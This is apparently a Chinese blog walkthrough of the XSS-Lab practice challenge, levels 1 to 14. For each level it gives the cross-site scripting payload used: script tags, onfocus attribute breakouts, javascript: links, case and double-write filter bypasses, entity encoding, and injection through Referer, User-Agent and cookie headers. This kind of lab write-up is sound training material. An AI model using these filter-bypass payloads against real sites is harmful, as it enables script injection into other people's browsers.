XSS-Lab

这一道题都有20关我真服了

level 1

查看源码

不难发现test会在页面里回显出来 所以我们直接再url里修改name的值

<script>alert(1)</script>

level 2

这里我们继续查看源码

我们继续使用 <script>alert()</script>

这里发现特殊的符号被转义了

我们重新构造payload "> <script>alert()</script> <"就通过了

level 3

这里我们发现不只是<>被实体化了 ' 也被实体化了

所以这道题需要运用到onfocus

我们构造payload ' onfocus=javascript:alert() '

然后再点击输入框获取焦点就通过了

onfocus

onfocus 是一个事件处理器属性,当 HTML 页面中的某个元素获得焦点时,会触发与之关联的事件处理函数。这个事件主要用于表单元素(如 <input><textarea><select>)和可聚焦的元素(如 <a> 链接、按钮等)

level4

这道题是双引号闭合 我们构造payload " onfocus=javascript:alert() "

level 5

这道题不仅过滤了js标签 还过滤了onfocus 我们采用 a herf 标签法

构造payload

复制代码
"> <a href=javascript:alert()>xxx</a> <"

构造好之后点击xss就好了

herf

href 是 HTML <a> 标签的属性,用于指定超链接的目标位置。它告诉浏览器当用户点击该链接时,应该跳转到哪里 href 可以指向网页、文件、电子邮件地址、电话号码,甚至是页面内的某个部分

level 6

这道题过滤了很多东西 但好像没过滤大小写 我们采用大小写绕过

构造payload "> <Script>alert()</Script><"

level 7

这里也是过滤了很多东西 我们采用双写绕过

构造payload

复制代码
"> <a hrehreff=javasscriptcript:alert()>x</a> <"

level 8

这里需要知道herf可以自动unicode解码

制造payload javascript:alert()

编码过后

复制代码
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

level 9

这道题过滤了 http://

制造payload javascript>alert()

这里我们需要经过html编码

复制代码
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/* http:// */

level 10

没有输入的地方 我们查看源码

关键字

复制代码
" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;

几乎都被实体化了 要使用get传参 这里还是要使用onfocus事件 因为没有输入框所以要加入type="text"

制造payload ?t_sort=" onfocus=javascript:alert() type="text

level 11

这里和上一道题差不多 就是需要用到refere头 传参

构造payload Referer: " onfocus=javascript:alert() type="text

Referer头的定义

Referer头是HTTP请求中的一个标头字段,用于指示当前请求的来源页面。通常由HTTP客户端(如浏览器)发送给服务器,帮助服务器了解用户是从哪个页面跳转而来的

level 12

这里是修改ua的参数完成注入 " onfocus=javascript:alert() type="text

level 13

名字为cook 考虑cookie 制造payload " onfocus=alert() type="text

level 14

这道题网站啥也没有 看下源码吧

level 15

我的出了点问题 第十五关 没跳转成功 下次再做吧

相关推荐
顺丰同城前端技术团队9 分钟前
DeepSeek 国产大模型新标杆
前端·后端·程序员
Java水解10 分钟前
微前端架构:从单体到模块化的前端新革命
前端
Mr_汪12 分钟前
uniapp使用h5的map(已弃用)
前端
前端进阶者15 分钟前
vite调试node_modules下面插件
前端·vite
YaHuiLiang23 分钟前
小微互联网公司与互联网创业公司 -- 学历之殇
前端·后端·面试
用户261245834016125 分钟前
vue学习路线(11.watch对比computed)
前端·vue.js
CAD老兵32 分钟前
前端 Source Map 原理与结构详解
前端
gnip35 分钟前
markdown预览自定义扩展实现
前端·javascript
大猫会长1 小时前
mac中创建 .command 文件,执行node服务
前端·chrome
旧时光_1 小时前
Zustand 状态管理库完全指南 - 进阶篇
前端·react.js